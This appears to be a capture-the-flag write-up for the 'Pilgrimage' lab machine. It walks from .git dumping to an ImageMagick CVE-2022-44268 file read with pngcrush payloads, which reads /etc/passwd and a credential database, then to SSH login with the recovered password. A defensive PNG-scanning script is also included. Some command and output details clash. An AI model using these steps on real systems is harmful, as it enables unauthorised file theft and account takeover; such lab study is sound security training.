Pilgrimage target machine

Information gathering

┌──(pytool)─(i3eg1nner㉿minilite)-[~/…/GitTools/Dumper/clone/assets]
└─$ sudo nmap --min-rate 10000 -p- 10.10.11.219
[sudo] password for i3eg1nner:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 01:34 EDT
Warning: 10.10.11.219 giving up on port because retransmission cap hit (10).
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.14s latency).
Not shown: 63441 closed tcp ports (reset), 2092 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 33.63 seconds

Only two ports are open: 22 and 80.

┌──(pytool)─(i3eg1nner㉿minilite)-[~/…/GitTools/Dumper/clone/assets]
└─$ sudo nmap -sT -sV -sC -O -p22,80 10.10.11.219
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-08 01:35 EDT
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.0031s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 20be60d295f628c1b7e9e81706f168f3 (RSA)
| 256 0eb6a6a8c99b4173746e70180d5fe0af (ECDSA)
|_ 256 d14e293c708669b4d72cc80b486e9804 (ED25519)
80/tcp open http nginx 1.18.0
| http-git:
| 10.10.11.219:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message:
image shrinking service initial commit. # Please ...
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: nginx/1.18.0
|_http-title: Pilgrimage - Shrink Your Images
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.85 seconds

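.git exposure

Port 80 exposes a .git directory, which may be a usable foothold, and the operating system is Debian. After adding the domain-to-IP mapping to the hosts file, visit the site in a browser and run directory brute-forcing at the same time.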

┌──(pytool)─(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ sudo dirsearch -u http://pilgrimage.htb

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/pilgrimage.htb/_23-07-08_01-54-25.txt

Error Log: /root/.dirsearch/logs/errors-23-07-08_01-54-25.log

Target: http://pilgrimage.htb/

[01:54:25] Starting:
[01:54:26] 403 - 555B - /.git/
[01:54:26] 403 - 555B - /.git/branches/
[01:54:26] 200 - 92B - /.git/config
[01:54:26] 200 - 23B - /.git/HEAD
[01:54:26] 200 - 73B - /.git/description
[01:54:26] 200 - 2KB - /.git/COMMIT_EDITMSG
[01:54:26] 403 - 555B - /.git/hooks/
[01:54:26] 301 - 169B - /.git -> http://pilgrimage.htb/.git/
[01:54:26] 200 - 240B - /.git/info/exclude
[01:54:26] 403 - 555B - /.git/logs/
[01:54:26] 403 - 555B - /.git/info/
[01:54:26] 200 - 195B - /.git/logs/HEAD
[01:54:26] 403 - 555B - /.git/refs/
[01:54:26] 301 - 169B - /.git/logs/refs -> http://pilgrimage.htb/.git/logs/refs/
[01:54:26] 301 - 169B - /.git/logs/refs/heads -> http://pilgrimage.htb/.git/logs/refs/heads/
[01:54:26] 301 - 169B - /.git/refs/heads -> http://pilgrimage.htb/.git/refs/heads/
[01:54:26] 200 - 195B - /.git/logs/refs/heads/master
[01:54:26] 403 - 555B - /.git/objects/
[01:54:26] 200 - 41B - /.git/refs/heads/master
[01:54:26] 301 - 169B - /.git/refs/tags -> http://pilgrimage.htb/.git/refs/tags/
[01:54:26] 200 - 4KB - /.git/index
[01:54:26] 403 - 555B - /.ht_wsr.txt
[01:54:26] 403 - 555B - /.htaccess.bak1
[01:54:26] 403 - 555B - /.htaccess.orig
[01:54:26] 403 - 555B - /.htaccess.save
[01:54:26] 403 - 555B - /.htaccess_extra
[01:54:26] 403 - 555B - /.htaccess.sample
[01:54:26] 403 - 555B - /.htaccess_orig
[01:54:26] 403 - 555B - /.htaccessOLD
[01:54:26] 403 - 555B - /.htaccessBAK
[01:54:26] 403 - 555B - /.htaccess_sc
[01:54:26] 403 - 555B - /.htpasswd_test
[01:54:26] 403 - 555B - /.htm
[01:54:26] 403 - 555B - /.htaccessOLD2
[01:54:26] 403 - 555B - /.html
[01:54:26] 403 - 555B - /.htpasswds
[01:54:26] 403 - 555B - /.httr-oauth
[01:54:33] 403 - 555B - /admin/.htaccess
[01:54:36] 403 - 555B - /administrator/.htaccess
[01:54:37] 403 - 555B - /app/.htaccess
[01:54:37] 301 - 169B - /assets -> http://pilgrimage.htb/assets/
[01:54:37] 403 - 555B - /assets/
[01:54:42] 302 - 0B - /dashboard.php -> /login.php
[01:54:48] 200 - 7KB - /index.php
[01:54:50] 200 - 6KB - /login.php
[01:54:50] 302 - 0B - /logout.php -> /
[01:54:58] 200 - 6KB - /register.php
[01:55:04] 301 - 169B - /tmp -> http://pilgrimage.htb/tmp/
[01:55:04] 403 - 555B - /tmp/
[01:55:06] 403 - 555B - /vendor/

Task Completed

The only thing worth attention in the directory brute-force results is .git. Search for: ".git" expose

The second link, Exposed .git Directory Exploitation | by Yani | InfoSec Write-ups (infosecwriteups.com), mentions a tool called GitTools. Download it locally and follow its instructions: internetwache/GitTools: A repository with 3 tools for pwn’ing websites with .git repositories available (github.com)

Dumper: This tool can be used to download as much as possible from the found .git repository from webservers which do not have directory listing enabled.

┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper]
└─$ ./gitdumper.sh http://pilgrimage.htb/.git/ clone
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating clone/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/e1/a40beebc7035212efdcb15476f9c994e3634a7
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/f3/e708fd3c3689d0f437b2140e08997dbaff6212
[+] Downloaded: objects/93/ed6c0458c9a366473a6bcb919b1033f16e7a8d
[+] Downloaded: objects/c2/cbe0c97b6f3117d4ab516b423542e5fe7757bc
[+] Downloaded: objects/6c/965df00a57fd13ad50b5bbe0ae1746cdf6403d
[+] Downloaded: objects/dc/446514835fe49994e27a1c2cf35c9e45916c71
[+] Downloaded: objects/46/44c40a1f15a1eed9a8455e6ac2a0be29b5bf9e
[+] Downloaded: objects/f1/8fa9173e9f7c1b2f30f3d20c4a303e18d88548
[+] Downloaded: objects/c4/18930edec4da46019a1bac06ecb6ec6f7975bb
[+] Downloaded: objects/36/c734d44fe952682020fd9762ee9329af51848d
[+] Downloaded: objects/b2/15e14bb4766deff4fb926e1aa080834935d348
[+] Downloaded: objects/8f/155a75593279c9723a1b15e5624a304a174af2
[+] Downloaded: objects/9e/ace5d0e0c82bff5c93695ac485fe52348c855e
[+] Downloaded: objects/a7/3926e2965989a71725516555bcc1fe2c7d4f9e
[+] Downloaded: objects/98/10e80fba2c826a142e241d0f65a07ee580eaad
[+] Downloaded: objects/26/8dbf75d02f0d622ac4ff9e402175eacbbaeddd
[+] Downloaded: objects/81/703757c43fe30d0f3c6157a1c20f0fea7331fc
[+] Downloaded: objects/76/a559577d4f759fff6af1249b4a277f352822d5
[+] Downloaded: objects/ff/dbd328a3efc5dad2a97be47e64d341d696576c
[+] Downloaded: objects/f2/b67ac629e09e9143d201e9e7ba6a83ee02d66e
[+] Downloaded: objects/8a/62aac3b8e9105766f3873443758b7ddf18d838
[+] Downloaded: objects/e9/2c0655b5ac3ec2bfbdd015294ddcbe054fb783
[+] Downloaded: objects/c2/a4c2fd4e5b2374c6e212d1800097e3b30ff4e2
[+] Downloaded: objects/88/16d69710c5d2ee58db84afa5691495878f4ee1
[+] Downloaded: objects/96/3349e4f7a7a35c8f97043c20190efbe20d159a
[+] Downloaded: objects/2f/9156e434cfa6204c9d48733ee5c0d86a8a4e23
[+] Downloaded: objects/b6/c438e8ba16336198c2e62fee337e126257b909
[+] Downloaded: objects/11/dbdd149e3a657bc59750b35e1136af861a579f
[+] Downloaded: objects/c3/27c2362dd4f8eb980f6908c49f8ef014d19568
[+] Downloaded: objects/8e/42bc52e73caeaef5e58ae0d9844579f8e1ae18
[+] Downloaded: objects/5f/ec5e0946296a0f09badeb08571519918c3da77
[+] Downloaded: objects/50/210eb2a1620ef4c4104c16ee7fac16a2c83987
[+] Downloaded: objects/06/19fc1c747e6278bbd51a30de28b3fcccbd848a
[+] Downloaded: objects/54/4d28df79fe7e6757328f7ecddf37a9aac17322
[+] Downloaded: objects/1f/8ddab827030fbc81b7cb4441ec4c9809a48bc1
[+] Downloaded: objects/47/6364752c5fa7ad9aa10f471dc955aac3d3cf34
[+] Downloaded: objects/b4/21518638bfb4725d72cc0980d8dcaf6074abe7
[+] Downloaded: objects/49/cd436cf92cc28645e5a8be4b1973683c95c537
[+] Downloaded: objects/1f/2ef7cfabc9cf1d117d7a88f3a63cadbb40cca3
[+] Downloaded: objects/23/1150acdd01bbbef94dfb9da9f79476bfbb16fc
[+] Downloaded: objects/ca/d9dfca08306027b234ddc2166c838de9301487
[+] Downloaded: objects/fd/90fe8e067b4e75012c097a088073dd1d3e75a4
[+] Downloaded: objects/c4/3565452792f19d2cf2340266dbecb82f2a0571
[+] Downloaded: objects/29/4ee966c8b135ea3e299b7ca49c450e78870b59
[+] Downloaded: objects/fb/f9e44d80c149c822db0b575dbfdc4625744aa4
[+] Downloaded: objects/2b/95e3c61cd8f7f0b7887a8151207b204d576e14
[+] Downloaded: objects/a5/29d883c76f026420aed8dbcbd4c245ed9a7c0b
[-] Downloaded: objects/23/12310101010101010101410301010101210101
[-] Downloaded: objects/23/03032323230123232323212123212303632303
[-] Downloaded: objects/23/21236303230321632123036767012147470701
[-] Downloaded: objects/47/07412547250503474341056701016565070147
[-] Downloaded: objects/41/61416543747052570741470565674701054165
[-] Downloaded: objects/65/43450543454147054147414565014170505650
[-] Downloaded: objects/54/74547454747476767476767676767236323632
[-] Downloaded: objects/36/76745054545454545456545454545454545454
[-] Downloaded: objects/76/76701676767670105676767672167676767010
[+] Downloaded: objects/cd/2774e97bfe313f2ec2b8dc8285ec90688c5adb
[+] Downloaded: objects/fa/175a75d40a7be5c3c5dee79b36f626de328f2e

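http://pilgrimage.htb/.git/ is the target directory, and the trailing / must be included in the argument. The second argument is the output directory, named clone here as in the example. Once the download succeeds, enter the clone directory and look at the git information.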

# git log: view the local commit log
┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ git log
commit e1a40beebc7035212efdcb15476f9c994e3634a7 (HEAD -> master)
Author: emily <emily@pilgrimage.htb>
Date: Wed Jun 7 20:11:48 2023 +1000

Pilgrimage image shrinking service initial commit.

# git status: view recent changes
┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ git status
On branch master
Changes not staged for commit:
(use "git add/rm <file>..." to update what will be committed)
(use "git restore <file>..." to discard changes in working directory)
deleted: assets/bulletproof.php
deleted: assets/css/animate.css
deleted: assets/css/custom.css
deleted: assets/css/flex-slider.css
deleted: assets/css/fontawesome.css
deleted: assets/css/owl.css
deleted: assets/css/templatemo-woox-travel.css
deleted: assets/images/banner-04.jpg
deleted: assets/images/cta-bg.jpg
deleted: assets/js/custom.js
deleted: assets/js/isotope.js
deleted: assets/js/isotope.min.js
deleted: assets/js/owl-carousel.js
deleted: assets/js/popup.js
deleted: assets/js/tabs.js
deleted: assets/webfonts/fa-brands-400.ttf
deleted: assets/webfonts/fa-brands-400.woff2
deleted: assets/webfonts/fa-regular-400.ttf
deleted: assets/webfonts/fa-regular-400.woff2
deleted: assets/webfonts/fa-solid-900.ttf
deleted: assets/webfonts/fa-solid-900.woff2
deleted: assets/webfonts/fa-v4compatibility.ttf
deleted: assets/webfonts/fa-v4compatibility.woff2
deleted: dashboard.php
deleted: index.php
deleted: login.php
deleted: logout.php
deleted: magick
deleted: register.php
deleted: vendor/bootstrap/css/bootstrap.min.css
deleted: vendor/bootstrap/js/bootstrap.min.js
deleted: vendor/jquery/jquery.js
deleted: vendor/jquery/jquery.min.js
deleted: vendor/jquery/jquery.min.map
deleted: vendor/jquery/jquery.slim.js
deleted: vendor/jquery/jquery.slim.min.js
deleted: vendor/jquery/jquery.slim.min.map

no changes added to commit (use "git add" and/or "git commit -a")

From the log and the status we can see that some files were deleted; they can be restored with the following command.

┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ git checkout -- .

┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ ls -liah
total 27M
982572 drwxr-xr-x 5 i3eg1nner i3eg1nner 4.0K Jul 8 03:58 .
982207 drwxr-xr-x 3 i3eg1nner i3eg1nner 4.0K Jul 8 03:44 ..
982703 drwxr-xr-x 6 i3eg1nner i3eg1nner 4.0K Jul 8 03:58 assets
982731 -rwxr-xr-x 1 i3eg1nner i3eg1nner 5.5K Jul 8 03:58 dashboard.php
982573 drwxr-xr-x 6 i3eg1nner i3eg1nner 4.0K Jul 8 03:58 .git
982732 -rwxr-xr-x 1 i3eg1nner i3eg1nner 9.1K Jul 8 03:58 index.php
982733 -rwxr-xr-x 1 i3eg1nner i3eg1nner 6.7K Jul 8 03:58 login.php
982734 -rwxr-xr-x 1 i3eg1nner i3eg1nner 98 Jul 8 03:58 logout.php
982735 -rwxr-xr-x 1 i3eg1nner i3eg1nner 27M Jul 8 03:58 magick
982736 -rwxr-xr-x 1 i3eg1nner i3eg1nner 6.7K Jul 8 03:58 register.php
982737 drwxr-xr-x 4 i3eg1nner i3eg1nner 4.0K Jul 8 03:58 vendor

After restoring, take a quick look through the files and directories.

┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ tree
.
├── assets
│   ├── bulletproof.php
│   ├── css
│   │   ├── animate.css
│   │   ├── custom.css
│   │   ├── flex-slider.css
│   │   ├── fontawesome.css
│   │   ├── owl.css
│   │   └── templatemo-woox-travel.css
│   ├── images
│   │   ├── banner-04.jpg
│   │   └── cta-bg.jpg
│   ├── js
│   │   ├── custom.js
│   │   ├── isotope.js
│   │   ├── isotope.min.js
│   │   ├── owl-carousel.js
│   │   ├── popup.js
│   │   └── tabs.js
│   └── webfonts
│       ├── fa-brands-400.ttf
│       ├── fa-brands-400.woff2
│       ├── fa-regular-400.ttf
│       ├── fa-regular-400.woff2
│       ├── fa-solid-900.ttf
│       ├── fa-solid-900.woff2
│       ├── fa-v4compatibility.ttf
│       └── fa-v4compatibility.woff2
├── dashboard.php
├── index.php
├── login.php
├── logout.php
├── magick
├── register.php
└── vendor
    ├── bootstrap
    │   ├── css
    │   │   └── bootstrap.min.css
    │   └── js
    │       └── bootstrap.min.js
    └── jquery
        ├── jquery.js
        ├── jquery.min.js
        ├── jquery.min.map
        ├── jquery.slim.js
        ├── jquery.slim.min.js
        └── jquery.slim.min.map

11 directories, 37 files

This turns up the database the application connects to and an unusual executable.

if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['username'] && $_POST['password']) {
  $username = $_POST['username'];
  $password = $_POST['password'];

  $db = new PDO('sqlite:/var/db/pilgrimage');
  $stmt = $db->prepare("SELECT * FROM users WHERE username = ? and password = ?");
  $stmt->execute(array($username,$password));

  if($stmt->fetchAll()) {
    $_SESSION['user'] = $username;
    header("Location: /dashboard.php");
  }
  else {
    header("Location: /login.php?message=Login failed&status=fail");
  }
}

While at it, I tested for SQL injection with sqlmap, without success.

sqlmap -u http://pilgrimage.htb/login.php --forms

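Previously, for POST injection I mostly captured the request in Burp, saved it to a local file and then ran sqlmap against it. This tutorial is recommended for a look at two other methods: 4.1 SqlMap POST login form injection in practice, "SqlMap Chinese user guide" - Wangan (wangan.com)

ImageMagick arbitrary file read vulnerability

That leaves only the suspicious executable. Because the file is so large, trying to read it turned up nothing useful, so I chose to simply run it. That said, it is advisable not to run files like this directly on your own machine, to avoid security problems.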

┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ ./magick
Error: Invalid argument or not enough arguments

Usage: magick tool [ {option} | {image} ... ] {output_image}
Usage: magick [ {option} | {image} ... ] {output_image}
magick [ {option} | {image} ... ] -script {filename} [ {script_args} ...]
magick -help | -version | -usage | -list {option}

The error message gives some usage instructions.

┌──(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ ./magick -version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)

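After a look at the version, I googled what this tool actually does.

It is an open-source image processing tool. Combined with what we saw on the home page, the site is most likely using this tool to process images uploaded by users. In addition, the tool's latest version is 7.1.1, while the copy in the files leaked through .git is version 7.1.0-49, so it may be vulnerable; try googling it.

It has an arbitrary file read vulnerability; look for a PoC by CVE:

voidz0r/CVE-2022-44268: A PoC for the CVE-2022-44268 - ImageMagick arbitrary file read (github.com)

Running this script reports that cargo does not exist. I was not sure whether I needed to install it on my own machine, so I found another PoC: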

duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC: CVE-2022-44268 ImageMagick Arbitrary File Read - Payload Generator (github.com)

# Install dependencies
apt-get install pngcrush imagemagick exiftool exiv2 -y

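# Take any PNG file on the local machine, name it vjp.png, and pass the name of the file you want to read as the argument; the tool writes it into the image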
┌──(i3eg1nner㉿minilite)-[~/Downloads/Pilgrimage]
└─$ pngcrush -text a "profile" "/etc/hosts" vjp.png
Recompressing IDAT chunks in vjp.png to pngout.png
Total length of data found in critical chunks = 32339
Best pngcrush method = 6 (ws 15 fm 6 zl 9 zs 0) = 32134
CPU time decode 0.017508, encode 0.292588, other 0.002413, total 0.314946 sec

# Check that the information was written into the image
┌──(i3eg1nner㉿minilite)-[~/Downloads/Pilgrimage]
└─$ exiv2 -pS pngout.png
STRUCTURE OF PNG FILE: pngout.png
address | chunk | length | data | checksum
8 | IHDR | 13 | ............ | 0xf7f684ff
33 | pHYs | 9 | ......... | 0x952b0e1b
54 | IDAT | 32077 | x......E....9...&..!.9D....Q.V | 0x26fba351
32143 | tEXt | 19 | profile./etc/passwd | 0x465bd758
32174 | IEND | 0 | | 0xae426082

# Upload the image to the vulnerable service to trigger the PoC

Copy the data portion above and decode it with Python.

┌──(kali㉿kali)-[~/Downloads/Pilgrimage]
└─$ python3 -c 'print(bytes.fromhex("<hex data>").decode("utf-8"))'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false

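Verified: the arbitrary file read vulnerability is indeed present. An attempt to read the shadow file failed. Next, try to read the database file mentioned in login.php.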

┌──(kali㉿kali)-[~/Downloads/Pilgrimage]
└─$ pngcrush -text a "profile" "/var/db/pilgrimage" vjp.png
Recompressing IDAT chunks in vjp.png to pngout.png
Total length of data found in critical chunks = 2206
Best pngcrush method = 4 (ws 15 fm 0 zl 9 zs 1) = 1201
CPU time decode 0.001379, encode 0.005750, other 0.000666, total 0.008438 sec

┌──(kali㉿kali)-[~/Downloads/Pilgrimage]
└─$ exiv2 -pS pngout.png
STRUCTURE OF PNG FILE: pngout.png
address | chunk | length | data | checksum
8 | IHDR | 13 | ............ | 0xbeb798c5
33 | pHYs | 9 | ......... | 0x009a9c18
54 | tIME | 7 | ......( | 0xc6655cae
73 | tEXt | 29 | Comment.Created with The GIMP | 0xef64256e
114 | IDAT | 1144 | x..._lSU.....j'.....O......8P. | 0xfa9e0ce2
1270 | tEXt | 26 | profile./var/db/pilgrimage | 0x704d8d3d
1308 | IEND | 0 | | 0xae426082
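
Both exiv2 listings show what a CVE-2022-44268 upload looks like on disk: a tEXt chunk whose keyword is profile and whose text is a file path. The following is an added example (not from the original post or from either PoC project) of an upload-side check in Python that walks the PNG chunks, flags that keyword and can drop text chunks before the image reaches ImageMagick; the function names and the sample image are constructed for illustration.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Assumption: zTXt and iTXt are treated like tEXt, as a conservative choice.
TEXT_CHUNK_TYPES = {b"tEXt", b"zTXt", b"iTXt"}


class PngError(ValueError):
    """The input is not a structurally valid PNG."""


def make_chunk(ctype, payload):
    """Serialize one chunk: length, type, payload, CRC32 over type+payload."""
    crc = zlib.crc32(ctype + payload)
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def iter_chunks(data):
    """Yield (type, payload) per chunk; reject bad lengths and bad CRCs."""
    if not data.startswith(PNG_SIGNATURE):
        raise PngError("missing PNG signature")
    pos = len(PNG_SIGNATURE)
    while pos < len(data):
        if pos + 12 > len(data):
            raise PngError("truncated chunk")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            raise PngError("chunk length runs past end of file")
        payload = data[pos + 8:end - 4]
        if struct.unpack(">I", data[end - 4:end])[0] != zlib.crc32(ctype + payload):
            raise PngError("bad CRC in %r chunk" % ctype)
        yield ctype, payload
        if ctype == b"IEND":
            return
        pos = end
    raise PngError("missing IEND chunk")


def find_profile_chunks(data):
    """Return (chunk type, text preview) for every text chunk keyed 'profile'."""
    hits = []
    for ctype, payload in iter_chunks(data):
        if ctype not in TEXT_CHUNK_TYPES:
            continue
        keyword, _, rest = payload.partition(b"\x00")
        # Case-insensitive comparison is a conservative assumption.
        if keyword.decode("latin-1").strip().lower() == "profile":
            hits.append((ctype.decode("ascii"), rest[:64].decode("latin-1")))
    return hits


def strip_text_chunks(data):
    """Rebuild the PNG without text chunks, which are ancillary metadata."""
    kept = [make_chunk(t, p) for t, p in iter_chunks(data) if t not in TEXT_CHUNK_TYPES]
    return PNG_SIGNATURE + b"".join(kept)


def build_sample_png(text_items=()):
    """Constructed 1x1 grayscale PNG carrying the given (keyword, text) tEXt chunks."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    chunks = [make_chunk(b"IHDR", ihdr),
              make_chunk(b"IDAT", zlib.compress(b"\x00\x00"))]  # filter byte + 1 pixel
    for keyword, text in text_items:
        body = keyword.encode("latin-1") + b"\x00" + text.encode("latin-1")
        chunks.append(make_chunk(b"tEXt", body))
    chunks.append(make_chunk(b"IEND", b""))
    return PNG_SIGNATURE + b"".join(chunks)


if __name__ == "__main__":
    # Constructed upload mirroring the second exiv2 listing on this page.
    upload = build_sample_png([("Comment", "Created with The GIMP"),
                               ("profile", "/var/db/pilgrimage")])
    print("flagged:", find_profile_chunks(upload))
    print("after stripping:", find_profile_chunks(strip_text_chunks(upload)))
```

Dropping text chunks at upload time is defence in depth; upgrading ImageMagick is the actual fix.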

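One problem: the data contains too many zeros, so I cut out the meaningful part and fed it to the decoding command from before. This finally turned up a readable string containing the same username that appeared in the earlier git log.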

┌──(kali㉿kali)-[~/Downloads/Pilgrimage]
└─$ python3 -c 'print(bytes.fromhex("180103172d656d696c796162696763686f6e6b79626f693132330a000000010ff7000ff7"))'
b'\x18\x01\x03\x17-emilyabigchonkyboi123\n\x00\x00\x00\x01\x0f\xf7\x00\x0f\xf7'

Try logging in over SSH, trying abigchonkyboi123emilyabigchonkyboi123 as the password.

┌──(pytool)─(i3eg1nner㉿minilite)-[~/tools/GitTools/Dumper/clone]
└─$ ssh emily@10.10.11.219
The authenticity of host '10.10.11.219 (10.10.11.219)' can't be established.
ED25519 key fingerprint is SHA256:uaiHXGDnyKgs1xFxqBduddalajktO+mnpNkqx/HjsBw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.219' (ED25519) to the list of known hosts.
emily@10.10.11.219's password:
Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jul 8 16:07:48 2023 from 10.10.16.42
emily@pilgrimage:~$ whoami
emily
emily@pilgrimage:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:e8:f2 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.219/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
emily@pilgrimage:~$ id
uid=1000(emily) gid=1000(emily) groups=1000(emily)
emily@pilgrimage:~$ uname -a
Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64 GNU/Linux
emily@pilgrimage:~$ ls -liah
total 36K
30 drwxr-xr-x 4 emily emily 4.0K Jul 8 16:10 .
39 drwxr-xr-x 3 root root 4.0K Jun 8 00:10 ..
43 lrwxrwxrwx 1 emily emily 9 Feb 10 13:42 .bash_history -> /dev/null
35 -rw-r--r-- 1 emily emily 220 Feb 10 13:41 .bash_logout
33 -rw-r--r-- 1 emily emily 3.5K Feb 10 13:41 .bashrc
44 drwxr-xr-x 3 emily emily 4.0K Jun 8 00:10 .config
46 -rw-r--r-- 1 emily emily 44 Jun 1 19:15 .gitconfig
55 drwxr-xr-x 3 emily emily 4.0K Jun 8 00:10 .local
34 -rw-r--r-- 1 emily emily 807 Feb 10 13:41 .profile
49 -rw-r----- 1 root emily 33 Jul 8 15:50 user.txt
emily@pilgrimage:~$ cat user.txt

Privilege escalation

Login succeeded; check sudo -l.

emily@pilgrimage:~/.local/share/nano$ sudo -l
[sudo] password for emily:
Sorry, user emily may not run sudo on pilgrimage.

Check the scheduled tasks.

emily@pilgrimage:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
